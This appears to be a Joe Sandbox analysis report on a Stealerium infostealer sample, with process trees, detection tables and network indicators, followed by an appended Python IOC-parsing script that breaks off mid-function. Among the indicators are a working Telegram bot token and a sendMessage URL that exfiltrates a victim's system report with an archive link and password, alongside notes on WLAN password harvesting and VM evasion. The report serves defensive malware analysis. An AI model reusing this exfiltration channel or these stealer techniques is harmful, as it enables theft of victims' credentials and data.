Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol

Impact: 1 Data Encrypted for Impact; 1 System Shutdown/Reboot; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
Behavior Graph (ID: 1565141)
Sample: LKxcbzlwkz.exe; start date: 29/11/2024; architecture: WINDOWS; score: 100

Start (node 2)
  DNS/IP: api.telegram.org; szurubooru.zulipchat.com; 6 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 21 other signatures
  Started processes: LKxcbzlwkz.exe (29); msiexec.exe
  api.telegram.org: Uses the Telegram API (likely for C&C communication)

LKxcbzlwkz.exe (node 9)
  DNS/IP: ip-score.com 188.138.68.212, 443, 49731, 49738 (GD-EMEA-DC-SXB1DE, Germany); 192.168.0.82, 49730, 49752, 49754 (unknown)
  Dropped files: C:\Users\user\AppData\Local\...\aut66E4.tmp (PE32+); C:\Users\user\AppData\Local\Temp\JOUNLV.exe (PE32+)
  Signatures: Found many strings related to Crypto-Wallets (likely being stolen); Installs a global keyboard hook
  Started processes: JOUNLV.exe (14, 123); cmd.exe (1)

JOUNLV.exe (node 16)
  DNS/IP: szurubooru.zulipchat.com 50.17.0.11, 443, 49751 (AMAZON-AESUS, United States); api.telegram.org 149.154.167.220, 443, 49739, 49748 (TELEGRAMRU, United Kingdom); 4 other IPs or domains
  Dropped files: C:\Users\user\AppData\...\YPSIACHYXW.docx (ASCII); C:\Users\user\AppData\...\WUTJSCBCFX.docx (ASCII); C:\Users\user\AppData\...56IKHQAIQAU.pdf (ASCII); C:\Users\user\...\user@724536_en-CH.zip (Zip)
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 7 other signatures
  Started processes: cmd.exe (1) (node 23); cmd.exe (node 26); cmd.exe (1) (node 28)

cmd.exe (node 21, started by LKxcbzlwkz.exe)
  Started processes: conhost.exe; openfiles.exe (1)

cmd.exe (node 23, started by JOUNLV.exe)
  Signatures: Uses netsh to modify the Windows network and firewall settings; Tries to harvest and steal WLAN passwords
  Started processes: netsh.exe (2); conhost.exe; findstr.exe (1); chcp.com (1)

cmd.exe (node 26, started by JOUNLV.exe)
  Started processes: conhost.exe; 3 other processes

cmd.exe (node 28, started by JOUNLV.exe)
  Started processes: conhost.exe; chcp.com (1); netsh.exe (2)

Source | Detection | Scanner | Label
LKxcbzlwkz.exe | 79% | ReversingLabs | Win32.Trojan.Nymeria
LKxcbzlwkz.exe | 100% | Avira | HEUR/AGEN.1321697
LKxcbzlwkz.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\aut66E4.tmp | 100% | Avira | TR/AVI.Stealerium.sbcde
C:\Users\user\AppData\Local\Temp\JOUNLV.exe | 100% | Avira | TR/AVI.Stealerium.sbcde
C:\Users\user\AppData\Local\Temp\aut66E4.tmp | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\JOUNLV.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\JOUNLV.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Temp\aut66E4.tmp | 66% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
https://szurubooru.zulipchat.com | 0% | Avira URL Cloud | safe
http://szurubooru.zulipchat.com | 0% | Avira URL Cloud | safe
https://szurubooru.zulipchat.com/api/v1/messages | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
szurubooru.zulipchat.com | 50.17.0.11 | true | true | | unknown
raw.githubusercontent.com | 185.199.110.133 | true | false | | high
store6.gofile.io | 31.14.70.249 | true | false | | high
ip-score.com | 188.138.68.212 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
api.gofile.io | 45.112.123.126 | true | false | | high
icanhazip.com | 104.16.184.241 | true | false | | high
56.14.11.0.in-addr.arpa | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://icanhazip.com/ | false | | high
https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txt | false | | high
https://api.telegram.org/bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/getMe | false | | high
https://ip-score.com/checkip/ | false | | high
https://api.telegram.org/bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/sendMessage?chat_id=-4556397073&text=%60%60%60%0A%F0%9F%98%B9%20%2AStealerium%20v3.5.2%20-%20Report%3A%2A%0ADate%3A%202024-11-29%204%3A57%3A07%20am%0ASystem%3A%20Microsoft%20Windows%2010%20Pro%20%2864%20Bit%29%0AUsername%3A%20user%0ACompName%3A%20724536%0ALanguage%3A%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus%3A%20Windows%20Defender%0A%0A%F0%9F%92%BB%20%2AHardware%3A%2A%0ACPU%3A%20Intel%28R%29%20Core%28TM%292%20CPU%206600%20%40%202.40%20GHz%0AGPU%3A%20PA_NMRCU%0ARAM%3A%204095MB%0APower%3A%20NoSystemBattery%20%28100%25%29%0AScreen%3A%201280x1024%0AWebcams%20count%3A%200%0A%0A%F0%9F%93%A1%20%2ANetwork%3A%2A%20%0AGateway%20IP%3A%20192.168.2.1%0AInternal%20IP%3A%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system%21%0AExternal%20IP%3A%208.46.123.228%0A%0A%F0%9F%92%B8%20%2ADomains%20info%3A%2A%0A%20%20%20-%20%F0%9F%8F%A6%20%2ABanking%20services%2A%20%28No%20data%29%0A%20%20%20-%20%F0%9F%92%B0%20%2ACryptocurrency%20services%2A%20%28No%20data%29%0A%20%20%20-%20%F0%9F%8D%93%20%2APorn%20websites%2A%20%28No%20data%29%0A%0A%F0%9F%8C%90%20%2ABrowsers%3A%2A%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History%3A%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks%3A%205%0A%0A%F0%9F%97%83%20%2ASoftware%3A%2A%0A%0A%F0%9F%A7%AD%20%2ADevice%3A%2A%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%F0%9F%A6%A0%20%2AInstallation%3A%2A%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Startup%20disabled%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Clipper%20not%20installed%0A%20%20%20%E2%88%9F%20%E2%9B%94%EF%B8%8F%20Keylogger%20not%20installed%0A%0A%F0%9F%93%84%20%2AFile%20Grabber%3A%2A%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images%3A%2020%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents%3A%2030%0A%0A%F0%9F%94%97%20%5BArchive%20download%20link%5D%28https%3A%2F%2Fgofile.io%2Fd%2FliMaKC%29%0A%F0%9F%94%90%20Archive%20password%20is%3A%20%227035101d0d346f9a1fd3ad400ac83b90%22%60%60%60&parse_mode=Markdown&disable_web_page_preview=True | false | | high
https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txt | false | | high
https://store6.gofile.io/uploadfile | false | | high
https://szurubooru.zulipchat.com/api/v1/messages | true | Avira URL Cloud: safe | unknown
https://api.gofile.io/servers | false | | high
https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt | false | | high
https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/processes_list.txt | false | | high
https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/gpu_list.txt | false | | high
https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/MachineGuid.txt | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.dr | false | | high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF | tmp42BD.tmp.dat.1.dr | false | | high
http://ip-score.com/checkip/TTC: | LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.dr | false | | high
https://github.com/dotnet/runtime8 | JOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org | JOUNLV.exe, 00000001.00000002.2015535093.000001BB38175000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E7C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ip-score.com/checkip/HC: | LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ip-score.com/checkip/3 | LKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store6.gofile.io/X | JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ip-score.com/ | LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.newtonsoft.com/json | JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://store6.gofile.io | JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.dr | false | | high
https://gofile.io/d/liMaKC) | JOUNLV.exe, 00000001.00000002.2015535093.000001BB381CC000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EC9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/sendMessage | JOUNLV.exe, 00000001.00000002.2015535093.000001BB38175000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | tmpF011.tmp.dat.1.dr, tmpF031.tmp.dat.1.dr | false | | high
https://api.gofile.io/ | JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/dotnet/runtime | JOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ip-score.com/checkip/fic | LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ | LKxcbzlwkz.exe, 00000000.00000003.1760441440.0000000004028000.00000004.00000020.00020000.00000000.sdmp, aut66E4.tmp.0.dr, JOUNLV.exe.0.dr | false | | high
http://ip-score.com/checkip/oft | LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ip-score.com/checkip/1865 | LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://aka.ms/dotnet-warnings/ | JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ip-score.com/checkip/W | LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ip-score.com/checkip/yiLkZ | LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | tmpF011.tmp.dat.1.dr, tmpF031.tmp.dat.1.dr | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.dr | false | | high
https://aka.ms/serializationformat-binary-obsolete | JOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.autoitscript.com/autoit3/files/beta/autoit/archive/sqlite/SQLite3 | LKxcbzlwkz.exe, 00000000.00000002.3000735536.00000000017D5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://aka.ms/binaryformatter | JOUNLV.exe, 00000001.00000002.2023716769.000001BB50AE0000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB481CB000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://raw.githubusercontent.com/icsharpcode/SharpZipLib/33f64eb0f28cdd2b084cb822fcc224c7c5aba553/ | JOUNLV.exe, 00000001.00000002.2024985170.000001BB50D65000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://icanhazip.com | JOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB384E9000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://api.gofile.io | JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/sendMessage?chat_id=-4556 | JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB381AC000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/JamesNK/Newtonsoft.Json | JOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.gofile.io | JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ip-score.com/checkip/TTC: | LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ip-score.com/checkip/ificates | LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icotmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://github.com/kgnfthJOUNLV.exe.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://ip-score.com/checkip/C:LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000B3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://github.com/icsharpcode/SharpZipLibJOUNLV.exe, 00000001.00000002.2015535093.000001BB38567000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015451084.000001BB37DC0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://ip-score.com/checkip/nLKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://ip-score.com/checkip/.com/checkip/ificatesLKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://ip-score.com/checkip/65LKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016tmpF011.tmp.dat.1.dr, tmpF031.tmp.dat.1.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://ip-score.com/checkip/LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://store6.gofile.ioJOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.ecosia.org/newtab/tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://szurubooru.zulipchat.comJOUNLV.exe, 00000001.00000002.2015535093.000001BB381D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brtmp42BD.tmp.dat.1.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://ip-score.com/checkip/2LKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://james.newtonking.com/projects/jsonJOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://ac.ecosia.org/autocomplete?q=tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://szurubooru.zulipchat.comJOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://ip-score.com/checkip/OLKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://ip-score.com/checkip/erseLKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://raw.githubusercontent.comJOUNLV.exe, 00000001.00000002.2015535093.000001BB37E21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://ip-score.com/checkip/.com/checkip/LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://ip-score.com/owsLKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://ip-score.com/checkip/C1%k.LKxcbzlwkz.exe, 00000000.00000002.3000735536.00000000017D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://www.newtonsoft.com/jsonschemaJOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://ip-score.com/checkip/LMEMLKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://www.nuget.org/packages/Newtonsoft.Json.BsonJOUNLV.exe, 00000001.00000002.2024186074.000001BB50B90000.00000004.08000000.00040000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB47E93000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2018670579.000001BB4805A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://ip-score.com/checkip/LMEMLKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2062832927.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, LKxcbzlwkz.exe, 00000000.00000003.2063068490.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://support.mozilla.orgtmp42BD.tmp.dat.1.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplestmpF011.tmp.dat.1.dr, tmpF031.tmp.dat.1.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          http://api.telegram.orgJOUNLV.exe, 00000001.00000002.2015535093.000001BB381AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://gofile.io/d/liMaKCJOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37E73000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB37ECD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                http://ip-score.com/LKxcbzlwkz.exe, 00000000.00000002.3000653293.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.16.184.241 | icanhazip.com | United States | 13335 | CLOUDFLARENETUS | false
45.112.123.126 | api.gofile.io | Singapore | 16509 | AMAZON-02US | false
50.17.0.11 | szurubooru.zulipchat.com | United States | 14618 | AMAZON-AESUS | true
31.14.70.249 | store6.gofile.io | Virgin Islands (BRITISH) | 199483 | LINKER-ASFR | false
185.199.110.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
188.138.68.212 | ip-score.com | Germany | 8972 | GD-EMEA-DC-SXB1DE | false

IP
192.168.0.82
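The URL table and the IP table above are what an analyst turns into blocklist and hunting material, but the sandbox export fuses the columns of each row into one string. The script below is an added example, not part of the Joe Sandbox report: it splits the fused cells back into fields, pulls the Telegram bot id out of the bot-API URL, defangs the hosts and joins each host with the IP and ASN the sandbox observed. The sample rows are copied from the two tables above; the role labels in HOST_ROLES and every function name are this example's own choices, based on the signatures the report lists (C2 URL found in the malware configuration, gofile upload, IP-check services, the one host the report marks malicious), not Joe Sandbox output.

```python
"""Turn the flattened URL and IP tables of this Joe Sandbox report into a
deduplicated, defanged IOC set grouped by the role each host plays."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Names that Joe Sandbox fuses onto the end of the URL column; the first one
# found in a row marks where the URL ends and the Source column begins.
SOURCE_START = re.compile(r"JOUNLV\.exe|LKxcbzlwkz\.exe|tmp[0-9A-F]+\.tmp\.dat")

# Telegram bot token as embedded in the bot API path: /bot<numeric id>:<secret>/
TELEGRAM_TOKEN = re.compile(r"/bot(\d+):([A-Za-z0-9_-]+)/")

# Assumed role per host (this example's reading of the report's signatures,
# not sandbox output). Unlisted hosts are library or browser defaults.
HOST_ROLES = {
    "api.telegram.org": "c2-exfil",
    "api.gofile.io": "upload", "store6.gofile.io": "upload", "gofile.io": "upload",
    "icanhazip.com": "ip-discovery", "ip-score.com": "ip-discovery",
    "szurubooru.zulipchat.com": "flagged-malicious",
}

# Constructed sample input: rows copied as-is from the URL table above.
URL_ROWS = [
    "http://icanhazip.comJOUNLV.exe, 00000001.00000002.2015535093.000001BB37EFD000.00000004.00000800.00020000.00000000.sdmpfalse",
    "https://api.telegram.org/bot7944498476:AAFDMdaCzUgaTzRefjkf7TykHhwwmm5XuCI/sendMessage?chat_id=-4556JOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmp, JOUNLV.exe, 00000001.00000002.2015535093.000001BB381AC000.00000004.00000800.00020000.00000000.sdmpfalse",
    "https://github.com/kgnfthJOUNLV.exe.0.drfalse",
    "http://ip-score.com/checkip/LKxcbzlwkz.exe, 00000000.00000002.3000322888.0000000000BA4000.00000004.00000020.00020000.00000000.sdmpfalse",
    "https://www.google.com/images/branding/product/ico/googleg_lodp.icotmpEFE0.tmp.dat.1.dr, tmp555.tmp.dat.1.drfalse",
    "http://store6.gofile.ioJOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpfalse",
    "https://szurubooru.zulipchat.comJOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmptrue",
    "https://gofile.io/d/liMaKCJOUNLV.exe, 00000001.00000002.2015535093.000001BB37FA4000.00000004.00000800.00020000.00000000.sdmpfalse",
]

# Constructed sample input: the three fused lines of each IP-table row above.
IP_ROWS = [
    ("149.154.167.220", "api.telegram.orgUnited Kingdom", "62041TELEGRAMRUfalse"),
    ("104.16.184.241", "icanhazip.comUnited States", "13335CLOUDFLARENETUSfalse"),
    ("45.112.123.126", "api.gofile.ioSingapore", "16509AMAZON-02USfalse"),
    ("50.17.0.11", "szurubooru.zulipchat.comUnited States", "14618AMAZON-AESUStrue"),
    ("31.14.70.249", "store6.gofile.ioVirgin Islands (BRITISH)", "199483LINKER-ASFRfalse"),
    ("185.199.110.133", "raw.githubusercontent.comNetherlands", "54113FASTLYUSfalse"),
    ("188.138.68.212", "ip-score.comGermany", "8972GD-EMEA-DC-SXB1DEfalse"),
]


def defang(text):
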